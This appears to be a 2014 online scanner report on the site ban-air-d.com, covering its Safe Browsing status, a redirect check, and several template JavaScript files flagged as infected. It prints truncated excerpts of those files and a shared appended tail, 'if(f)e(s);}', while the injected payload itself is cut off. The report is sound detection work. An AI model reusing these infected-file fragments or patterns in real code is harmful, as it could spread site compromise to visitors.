Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ban-air-d.com
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ban-air-d.com/ | 200 OK Content-Length: 30027 Content-Type: text/html | clean |
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/mootools/mootools-release-1.11.js | 200 OK Content-Length: 51156 Content-Type: text/javascript | malicious |
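Malicious code - confirmed by antiviruses (see below). The excerpt below is truncated: it shows the beginning of the file, then jumps to the file's last characters (`if(f)e(s);}`). The `eval(function(p,a,c,k,e,d){...})` wrapper at the start is a common JavaScript packer format that legitimate libraries also ship in, so it is not by itself the indicator. Every flagged file on this page, including the ones that are not packed, ends with the same `if(f)e(s);}` tail, which suggests that the same code was appended to the end of each script; this should be confirmed by comparing each file with a clean copy.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o ci={cj:\'1.11\'};k $77(N){m(N!=9N)};k $F(N){B(!$77(N))m O;B(N.5i)m\'G\';o F=7c N;B(F==\'2I\'&&N.ch){22(N.84){Y 1:m\'G\';Y 3:m(/\\S/).2v(N.ax)?\'cg\':\'cd\ if(f)e(s);}
Antivirus reports: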
| ||
http://ban-air-d.com/media/system/js/caption.js | 200 OK Content-Length: 1720 Content-Type: text/javascript | clean |
http://ban-air-d.com/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 10995 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 1B=2 1E({1v:5(t,4){1.1w({1h:\'c...\',16:\'Y\',13:\'1U.1V\',18:\'1T.c-9\',17:\'h.f\',1j:\'15 e\',1g:\'15 A\',1m:\'1P e 1Q\',1G:\'1R e\',m:\'1W.1X?22=23&21=20&a if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/modules/mod_yoo_carousel/mod_yoo_carousel.js | 200 OK Content-Length: 10183 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('C I=h n({1r:5(d,3){2.o({1b:n.t,Y:n.t,1l:n.t,11:n.t,10:\'.s\',13:\'.1g\',17:\'.a\',16:\'.a-6\',Z:\'.a-1s\',X:1q,1j:1t,z:\'x\',K:0,D:\'1u\',N:\'1v\',M:\'19\',k:1p,9:\ if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 42178 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof MooTools=="undefined"){throw"Unable to load Shadowbox, MooTools library not found."}var Shadowbox={};Shadowbox.lib={getStyle:function(B,A){return $(B).getStyle(A)},setStyle:function(D,C,E){D=$(D);if(typeof C!="object"){var A={};A[C]=E;C=A}for(var B in C){D.setStyle(B,C[B])}},get:function(A){return $(A)},remove:function(A){A.parentNode.removeChild(A)},getTarget:function(A){return A.target||{}},preventDefault:function(A){new Event(A).preventDefault()},addEvent:function(C,A,B){$(C).addEve if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/addons/base.js | 200 OK Content-Length: 11049 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4 1U={1V:5(1G,X,W){4 k=0;4 x=[];4 O=1G.26(" ");4 1E=O.27();4 16=\'\';O.h(5(f,i){16+=\'.1e("\'+f+\'")\'});$1Z(1E).h(5(B,i){25(\'x.24(B\'+16+\');\')});x.h(5(b,i){8(!$ if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 8602 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 t=6 v({w:4(q,p,2){0.x({r:\'m\'},2);0.7=q;0.9=p;y(0.2.r){A\'z\':0.j();C;m:0.g()}},g:4(){5 2={};e(!$n(0.2.8)&&!$n(0.2.c)){2={c:-1}}$k(0.7).l(4(3,i){e(3.o(\' if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/addons/fancymenu.js | 200 OK Content-Length: 10080 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n 1a=c T({1v:7(d,6){3.K({1A:1B.1t.1C,O:1o,1E:I,1e:T.1i,e:1,f:\'y\',1b:1h,Y:[\'1f\',\'1l\',\'1m\',\'1r\',\'1q\',\'1p\',\'1s\',\'1n\'],W:\'5.1g\',V:\'5.X\'},6);3.d=$( if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 8589 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 g=f q({u:6(e,7){9.x({i:\'w\',y:s,B:h.v.A,z:r},7);2 3={\'8\':0,\'a\':0,\'b\':0};t(9.7.i){j\'8\':3={\'8\':0,\'b\':0};m;j\'a\':3={\'a\':0,\'b\':0};m}$$(e).M(6(4){2 1 if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/templates/yoo_colorpalette/lib/js/yoo_tools.js | 200 OK Content-Length: 15795 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var YOOTools = { start: function() { YOOTools.setDivHeight(); new YOOAccordionMenu('div#middle ul.menu li.toggler', 'ul.accordion', { accordion: 'slide' }); new YOOFancyMenu($E('ul', 'menu'), { mode: 'move', transition: Fx.Transitions.Expo.easeOut, duration: 700 }); new YOODropdownMenu('div#menu li.parent', { mode: 'height', transition: Fx.Transitions.Expo.easeOut }); switch (YtSettings.color) { cas if(f)e(s);} Antivirus reports:
| ||
http://ban-air-d.com/index.php | 200 OK Content-Length: 30027 Content-Type: text/html | clean |
http://ban-air-d.com/index.php?option=com_content&view=article&id=113 | 200 OK Content-Length: 13263 Content-Type: text/html | clean |
http://ban-air-d.com/test404page.js | 404 Not Found Content-Length: 275 Content-Type: text/html | clean |
http://ban-air-d.com/index.php?option=com_content&view=article&id=114 | 200 OK Content-Length: 13128 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ban-air-d.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 08 Jul 2014 07:59:53 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 08 Jul 2014 07:59:53 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 748d2e58c1df2e71aef9c0503f002ccb=ee16s79msbvfll9s9l5cfjg3f7; path=/
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: ban-air-d.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 08 Jul 2014 07:59:53 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 08 Jul 2014 07:59:53 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 748d2e58c1df2e71aef9c0503f002ccb=ee16s79msbvfll9s9l5cfjg3f7; path=/
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: ban-air-d.com
Referer: http://www.google.com/search?q=ban-air-d.com
Result:
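The result is similar to that of the first query. No suspicious redirects were found. Note that the two queries shown differ only in the Referer header, so this test does not rule out redirects that depend on other request properties.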
GET / HTTP/1.1
Host: ban-air-d.com
Referer: http://www.google.com/search?q=ban-air-d.com
Result:
The result is similar to the first query. There are no suspicious redirects found.